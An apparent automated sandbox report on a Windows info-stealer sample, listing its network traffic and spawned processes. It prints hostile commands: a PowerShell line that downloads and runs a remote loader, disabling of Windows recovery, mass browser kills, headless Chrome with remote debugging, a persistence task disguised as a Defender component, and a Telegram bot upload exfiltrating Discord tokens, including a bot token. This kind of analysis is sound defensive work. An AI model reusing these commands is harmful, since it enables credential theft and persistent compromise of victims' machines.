                                                                            2024-12-03 14:27:28 UTC114INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 69 6c 65 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 22 2c 22 66 69 6c 65 22 3a 22 75 70 6c 6f 61 64 73 5c 2f 63 63 30 30 32 33 63 39 64 30 34 34 37 63 30 38 62 63 31 61 37 64 33 36 62 38 36 37 38 37 33 31 2e 7a 69 70 22 7d
                                                                            Data Ascii: {"status":"success","message":"File uploaded successfully","file":"uploads\/cc0023c9d0447c08bc1a7d36b8678731.zip"}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549828149.154.167.2204435952C:\Users\user\Desktop\SplpM1fFkV.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:27:58 UTC288OUTPOST /bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocument HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            User-Agent: Go-http-client/1.1
                                                                            Content-Length: 1231
                                                                            Content-Type: multipart/form-data; boundary=fb3981165d4dd3166da37d6a6c16cea7176f32ba181dabbe7f6a56f7b0ef
                                                                            Accept-Encoding: gzip
                                                                            2024-12-03 14:27:58 UTC898OUTData Raw: 2d 2d 66 62 33 39 38 31 31 36 35 64 34 64 64 33 31 36 36 64 61 33 37 64 36 61 36 63 31 36 63 65 61 37 31 37 36 66 33 32 62 61 31 38 31 64 61 62 62 65 37 66 36 61 35 36 66 37 62 30 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 35 31 39 31 39 38 34 36 0d 0a 2d 2d 66 62 33 39 38 31 31 36 35 64 34 64 64 33 31 36 36 64 61 33 37 64 36 61 36 63 31 36 63 65 61 37 31 37 36 66 33 32 62 61 31 38 31 64 61 62 62 65 37 66 36 61 35 36 66 37 62 30 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 61 6c 66 6f 6e 73
                                                                            Data Ascii: --fb3981165d4dd3166da37d6a6c16cea7176f32ba181dabbe7f6a56f7b0efContent-Disposition: form-data; name="chat_id"5951919846--fb3981165d4dd3166da37d6a6c16cea7176f32ba181dabbe7f6a56f7b0efContent-Disposition: form-data; name="document"; filename="user
                                                                            2024-12-03 14:27:58 UTC333OUTData Raw: 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 6c 66 6f 6e 73 5c 67 61 6d 65 73 5c 50 4b 01 02 14 00 14 00 00 00 00 00 b7 4b 83 59 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 00 00 61 6c 66 6f 6e 73 5c 53 6f 63 69 61 6c 4d 65 64 69 61 73 5c 50 4b 01 02 14 00 14 00 00 00 00 00 6a 4b 83 59 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 00 00 00 61 6c 66 6f 6e 73 5c 64 69 73 63 6f 72 64 5f 74 6f 6b 65 6e 73 2e 74 78 74 50 4b 01 02 14 00 14 00 00 00 08 00 6a 4b 83 59 e9 3c 2b 23 67 01 00 00 38 02 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 94 00 00 00 61 6c 66 6f 6e 73 5c 70 63 5f 73 70 65 63 69 66 69 63 61 74 69 6f 6e 73 2e 6a 73 6f 6e 50 4b 05 06 00 00 00 00 04 00 04 00
                                                                            Data Ascii: user\games\PKKY+user\SocialMedias\PKjKY]user\discord_tokens.txtPKjKY<+#g8user\pc_specifications.jsonPK
                                                                            2024-12-03 14:28:00 UTC388INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Tue, 03 Dec 2024 14:27:59 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 436
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-12-03 14:28:00 UTC436INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 38 31 33 35 30 30 32 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 68 75 68 75 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 68 61 6d 70 68 75 63 6b 68 61 6e 67 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 35 31 39 31 39 38 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 72 61 63 75 6c 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 72 61 63 75 6c 61 6a 7a 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 36 30 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                            Data Ascii: {"ok":true,"result":{"message_id":15,"from":{"id":8081350024,"is_bot":true,"first_name":"huhu","username":"phamphuckhang_bot"},"chat":{"id":5951919846,"first_name":"Dracula","username":"Draculajz","type":"private"},"date":1733236079,"document":{"file_name


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:26:49
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\SplpM1fFkV.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\SplpM1fFkV.exe"
                                                                            Imagebase:0x7a0000
                                                                            File size:5'043'200 bytes
                                                                            MD5 hash:770BC9A9A9FF4284B8CB6E333478D25C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:09:26:49
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex"
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Go lang
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:09:26:49
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\ReAgentc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:reagentc.exe /disable
                                                                            Imagebase:0x7ff7e2df0000
                                                                            File size:44'544 bytes
                                                                            MD5 hash:A109CC3B919C7D40E4114966340F39E5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM firefox.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM brave.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM opera.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:09:27:17
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM kometa.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:09:27:18
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM orbitum.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:09:27:18
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM centbrowser.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:09:27:18
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM 7star.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:14
                                                                            Start time:09:27:18
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM sputnik.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:15
                                                                            Start time:09:27:18
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM vivaldi.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:16
                                                                            Start time:09:27:19
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM epicprivacybrowser.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:17
                                                                            Start time:09:27:19
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM msedge.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:18
                                                                            Start time:09:27:19
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM uran.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:19
                                                                            Start time:09:27:20
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM yandex.exe
                                                                            Imagebase:0x7ff632ac0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:20
                                                                            Start time:09:27:20
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM iridium.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:21
                                                                            Start time:09:27:20
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:22
                                                                            Start time:09:27:20
                                                                            Start date:03/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"
                                                                            Imagebase:0x7ff715980000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:23
                                                                            Start time:09:27:21
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:09:27:21
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff7e52b0000
                                                                            File size:55'320 bytes
                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:25
                                                                            Start time:09:27:21
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM firefox.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:26
                                                                            Start time:09:27:22
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM brave.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:27
                                                                            Start time:09:27:22
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM opera.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:28
                                                                            Start time:09:27:22
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM kometa.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:29
                                                                            Start time:09:27:22
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM orbitum.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:30
                                                                            Start time:09:27:22
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM centbrowser.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:31
                                                                            Start time:09:27:23
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM 7star.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:32
                                                                            Start time:09:27:23
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM sputnik.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:33
                                                                            Start time:09:27:23
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM vivaldi.exe
                                                                            Imagebase:0x7ff6068e0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:34
                                                                            Start time:09:27:23
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM epicprivacybrowser.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:35
                                                                            Start time:09:27:24
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM msedge.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:36
                                                                            Start time:09:27:24
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM uran.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:37
                                                                            Start time:09:27:24
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM yandex.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:38
                                                                            Start time:09:27:24
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM iridium.exe
                                                                            Imagebase:0x7ff792ef0000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:39
                                                                            Start time:09:27:27
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
                                                                            Imagebase:0x7ff60ba30000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:40
                                                                            Start time:09:27:27
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:powershell -Command $env:USERNAME
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:41
                                                                            Start time:09:27:27
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:42
                                                                            Start time:09:27:28
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
                                                                            Imagebase:0x7ff625ff0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:43
                                                                            Start time:09:27:28
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:44
                                                                            Start time:09:27:28
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force"
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:45
                                                                            Start time:09:27:28
